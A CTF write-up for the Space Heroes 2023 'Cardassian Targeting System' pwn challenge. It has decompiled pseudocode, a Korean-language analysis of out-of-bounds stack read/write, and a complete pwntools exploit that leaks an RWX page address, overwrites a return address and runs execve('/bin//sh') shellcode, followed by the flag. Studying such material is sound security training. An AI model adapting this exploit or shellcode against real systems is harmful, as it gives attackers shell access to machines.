Space Heroes CTF 2023 - Cardassian Targeting System (oob, shellcode)

?

  • [? solves / 249 points]

Analysis

// IDA pseudocode of the binary's main(), reproduced as extracted (no indentation).
// Frame layout worth noting: `array` sits at rbp-0x60, the RWX-page pointer `addr`
// directly below it at rbp-0x68, and the stack canary above it at rbp-8.
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
int selectedOption; // [rsp+0h] [rbp-70h] BYREF
int pageSize; // [rsp+4h] [rbp-6Ch]
char *addr; // [rsp+8h] [rbp-68h] BYREF
__int64 array[10]; // [rsp+10h] [rbp-60h] BYREF
unsigned __int64 v7; // [rsp+68h] [rbp-8h]

v7 = __readfsqword(0x28u); // stack canary (fs:0x28) guarding main's frame; the exploit's target, array[-3], lies on the other side of `array` from it
print_art();
putchar(10);
addr = malloc(0x40uLL); // this 0x40-byte chunk is never used: posix_memalign below overwrites `addr` (leaked, harmless)
pageSize = getpagesize();
posix_memalign(&addr, pageSize, pageSize); // pageSize = 4096 0x1000 -> one page-aligned page; `addr` is now page-aligned
mprotect(addr, pageSize, 7); // 7 == PROT_READ|PROT_WRITE|PROT_EXEC: the page is RWX, so anything read into it is executable
printf("Please enter your name and rank >>> ");
fgets(addr, 64, _bss_start); // `_bss_start` is IDA's mislabel for stdin; up to 63 bytes land at the start of the RWX page. fgets stops at '\n', so a payload must not contain 0x0a
printf("\nWelcome back, %s\n", addr);
while ( 1 )
{
print_menu();
__isoc99_scanf("%d", &selectedOption); // return value unchecked: on a parse failure selectedOption keeps its previous (initially indeterminate) value
getchar();
performAction(selectedOption, array); // the OOB read/write live here (body not shown). array[-1] is `addr`; with rsp at rbp-0x70 this `call` pushes its return address at rbp-0x78 == array[-3], the slot the exploit overwrites
}
}

malloc(0x40)으로 받은 청크는 곧바로 posix_memalign이 addr를 덮어쓰면서 버려지고(누수), 실제로 쓰이는 것은 페이지 크기(4096)로 정렬된 별도의 영역이다. 이 영역은 mprotect(addr, pageSize, 7) — PROT_READ|PROT_WRITE|PROT_EXEC — 로 실행 권한까지 가진 RWX 페이지가 되고, fgets(addr, 64, stdin)이 최대 63바이트를 여기에 그대로 읽어 들인다. 여기에 쉘코드를 넣고 실행 흐름을 이 주소로 돌리면 된다. 단, fgets는 개행(0x0a)에서 입력을 끊으므로 쉘코드 안에 0x0a 바이트가 있으면 안 된다.

performAction 함수(본문은 생략)에서 인덱스 검사가 없는 oob read와 oob write를 대놓고 찾을 수 있다. main의 스택 레이아웃을 보면 array는 rbp-0x60에, 바로 아래 rbp-0x68에는 RWX 페이지 포인터 addr가 있으므로 array[-1]을 읽으면 쉘코드가 놓인 주소가 그대로 새어 나온다. 또 main의 rsp가 rbp-0x70이므로 performAction을 call할 때 리턴 주소는 rbp-0x78, 즉 array[-3] 자리에 쌓인다. 이 슬롯을 쉘코드 주소로 덮어쓰면 performAction이 ret하는 순간 RWX 페이지로 점프한다(카나리는 array 위쪽에 있어 건드리지 않는다).

Solve

Exploit Code

from pwn import * 

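# Target selection. The remote CTF service sits behind a TLS front end, hence
# port 443 with ssl=True and an explicit SNI. Run `python3 solve.py LOCAL` to
# drive a local copy of the binary instead (pwntools' `args` parses KEY=VALUE /
# flag words from the command line); the default stays the remote target.
HOST = "spaceheroes-cardassian-targeting-system.chals.io"
BINARY = "./cardassian-targeting-system"

if args.LOCAL:
    p = process(BINARY)
else:
    p = remote(HOST, 443, ssl=True, sni=HOST)
# Loaded for symbol/address lookups while debugging; the exploit itself needs
# no addresses from the binary (everything is leaked at runtime).
e = ELF(BINARY)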

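def oob_read(idx):
    """Leak the 8-byte value at array[idx] through menu option 4 (the OOB read).

    The service echoes the slot as a decimal integer after the text
    'coordinates: ', which is what gets parsed here. `idx` may be negative:
    -1 is the `addr` pointer that sits directly below `array` in main's frame.
    """
    # pwntools tubes want bytes; sending str relies on implicit encoding.
    p.sendline(b"4")
    p.sendline(str(idx).encode())
    p.recvuntil(b"coordinates: ")
    return int(p.recvline().strip(), 10)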

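def oob_write(idx, data):
    """Write the integer `data` into array[idx] through menu option 3 (the OOB write).

    `idx` may be negative. -3 is rbp-0x78, the return address pushed by main's
    call to performAction; writing the RWX page's address there redirects
    execution to the shellcode as soon as performAction returns. `data` is sent
    as decimal text, the same way main reads its menu number with scanf.
    """
    p.sendline(b"3")
    if args.PAUSE:
        # Opt-in stop (`PAUSE=1` on the command line) to attach a debugger
        # before the write lands. The old unconditional pause() blocked every
        # unattended run on a keypress.
        pause()
    p.sendline(str(idx).encode())
    p.sendline(str(data).encode())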

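def asdf(shellcode):
    """Send `shellcode` as the "name and rank" answer, i.e. into the RWX page.

    main reads that answer with fgets(addr, 64, stdin), so the payload must fit
    in 63 bytes and must not contain a newline (0x0a), which would cut it short
    and leave a truncated, crashing stub in the page.

    Raises:
        ValueError: if the payload is too long or contains 0x0a.
    """
    if len(shellcode) > 63:
        raise ValueError("payload longer than the 63 bytes fgets() accepts")
    if b"\n" in shellcode:
        raise ValueError("payload contains 0x0a; fgets() would stop there")
    p.sendline(shellcode)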

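# x86-64 execve("/bin//sh", NULL, NULL), 23 bytes:
#   xor rsi,rsi; push rsi; mov rdi,"/bin//sh"; push rdi; push rsp; pop rdi;
#   push 0x3b; pop rax; cdq; syscall
# Contains no 0x0a byte (fgets would truncate there), and is sent as the
# "name and rank" answer so it lands at the very start of the RWX page.
shellcode = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"
asdf(shellcode)

# array[-1] is `addr` in main's frame: the pointer to the RWX page that now
# holds the shellcode. posix_memalign made it page-aligned, so a misaligned
# value means the wrong slot was read (e.g. the menu output got out of sync);
# bail out rather than stuff garbage into a return address.
heap = oob_read(-1)
info(hex(heap))
if heap & 0xfff:
    error("leaked value %#x is not page-aligned; not the RWX page pointer" % heap)

# array[-3] is rbp-0x78, the return address pushed by main's call to
# performAction. Overwrite it with the page address; performAction's `ret`
# then lands directly on the shellcode.
oob_write(-3, heap)

p.interactive()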

Flag

shctf{cardass1an5_ar3_m3t1culou5_r3c0rd_k33p3rs}